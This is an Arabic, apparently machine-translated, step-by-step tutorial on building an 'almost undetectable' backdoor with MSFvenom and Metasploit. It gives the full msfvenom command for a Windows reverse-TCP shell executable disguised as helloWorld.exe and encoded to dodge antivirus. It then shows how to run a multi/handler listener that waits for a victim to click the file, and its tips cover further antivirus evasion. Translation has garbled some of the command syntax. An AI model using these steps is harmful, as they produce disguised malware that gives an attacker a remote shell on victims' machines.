كيفية إنشاء باب خلفي غير قابل للكشف تقريبًا باستخدام MSFvenom في Kali Linux

2024 مؤلف: Gilbert Ryder | [email protected]. آخر تعديل: 2023-12-16 17:25

يتم استخدام الباب الخلفي لتجاوز آليات الأمان ، وغالبًا ما يتم ذلك بشكل سري وغير قابل للكشف في الغالب. باستخدام MSFvenom ، وهو مزيج من msfpayload و msfencode ، من الممكن إنشاء باب خلفي يتصل مرة أخرى بالمهاجم باستخدام بروتوكول TCP العكسي. من أجل تطوير باب خلفي ، تحتاج إلى تغيير توقيع برنامجك الضار لتفادي أي برنامج مضاد فيروسات. أكمل هذا المشروع على زوج من أجهزة الكمبيوتر التي لديك إذن للوصول إليها ، وفي هذه العملية ، ستتعلم المزيد عن أمان الكمبيوتر وكيف يعمل هذا النوع من الباب الخلفي.

خطوات

قم بإنشاء باب خلفي غير قابل للكشف تقريبًا باستخدام MSFvenom في Kali Linux الخطوة 1

الخطوة 1. ابدأ تشغيل Kali وقم بتشغيل وحدة التحكم الطرفية

قم بإنشاء باب خلفي غير قابل للكشف تقريبًا باستخدام MSFvenom في Kali Linux الخطوة 2

الخطوة 2. اكتب ifconfig لعرض الواجهة والتحقق من عنوان IP الخاص بك

قم بإنشاء باب خلفي غير قابل للكشف تقريبًا باستخدام MSFvenom في Kali Linux الخطوة 3

الخطوة 3. اكتب ترميز msfvenom -l لإظهار قائمة الترميز

ستستخدم x86 / shikata_ga_nai كبرنامج تشفير

قم بإنشاء باب خلفي غير قابل للكشف تقريبًا باستخدام MSFvenom في Kali Linux الخطوة 4

الخطوة 4. اكتب "msfvenom -a x86 --platform windows -p windows / shell / reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86 / shikata_ga_nai -f exe> helloWorld.exe

-a x86 - يحدد نظام التشغيل windows هندسة معمارية لاستخدامها.
-p windows / shell / reverse_tcp يعين الحمولات المراد تضمينها.
يعيّن LHOST عنوان IP الخاص بالمستمع.
يعين LPORT منفذ الإصغاء.
يتم تعيين -b "\ x00" لتجنب الحرف السيئ (بايت فارغ).
يعيّن -e x86 / shikata_ga_nai اسم أجهزة التشفير.
-f exe> helloWorld.exe يعين تنسيق الإخراج.

قم بإنشاء باب خلفي غير قابل للكشف تقريبًا باستخدام MSFvenom في Kali Linux الخطوة 5

الخطوة 5. اكتب msfconsole لتنشيط Metasploit

الآن قمت بإنشاء الباب الخلفي الخاص بك. عندما تنقر الضحية على helloWorld.exe ، سيتم تنشيط حمولة shell المضمنة وإعادة الاتصال بنظامك. لتلقي الاتصال ، يجب عليك فتح المعالج المتعدد في Metasploit وتعيين الحمولات

قم بإنشاء باب خلفي غير قابل للكشف تقريبًا باستخدام MSFvenom في Kali Linux الخطوة 6

الخطوة 6. اكتب استخدام استغلال / متعدد / معالج

قم بإنشاء باب خلفي غير قابل للكشف تقريبًا باستخدام MSFvenom في Kali Linux الخطوة 7

الخطوة 7. اكتب مجموعة الحمولة windows / shell / reverse_tcp

قم بإنشاء باب خلفي غير قابل للكشف تقريبًا باستخدام MSFvenom في Kali Linux الخطوة 8

الخطوة 8. اكتب خيارات العرض للتحقق من الوحدة

قم بإنشاء باب خلفي غير قابل للكشف تقريبًا باستخدام MSFvenom في Kali Linux الخطوة 9

الخطوة 9. اكتب set LHOST 192.168.48.129

يعيّن "LHOST" عنوان IP للمستمع

قم بإنشاء باب خلفي غير قابل للكشف تقريبًا باستخدام MSFvenom في Kali Linux الخطوة 10

الخطوة 10. اكتب تعيين LPORT 4444

يعين "LPORT" منفذ المصغي

قم بإنشاء باب خلفي غير قابل للكشف تقريبًا باستخدام MSFvenom في Kali Linux الخطوة 11

الخطوة 11. اكتب run وانتظر الاتصال من جهاز الضحية

قم بإنشاء باب خلفي غير قابل للكشف تقريبًا باستخدام MSFvenom في Kali Linux الخطوة 12

الخطوة 12. انتظر حتى تنقر الضحية على helloWorld.exe

بعد ذلك سيتم توصيلك بجهاز الضحية بنجاح.

نصائح

استخدام -i في MSFvenom سيمثل التكرارات في الترميز. في بعض الأحيان ، قد تساعد المزيد من التكرارات في التهرب من برنامج AV.
لقد تعلمت كيفية إنشاء الباب الخلفي والتشفير باستخدام MSFvenom ، لكن هذه الطريقة لن تعمل بشكل مثالي مع بعض برامج AV في الوقت الحاضر. السبب وراء ذلك هو بسبب قوالب التنفيذ في MSFvenom. أضاف بائعو AV التوقيع الثابت لهذه القوالب وابحثوا عنها فقط. الحل لهذه المشكلة هو استخدام قالب تنفيذ مختلف أو أدوات مختلفة.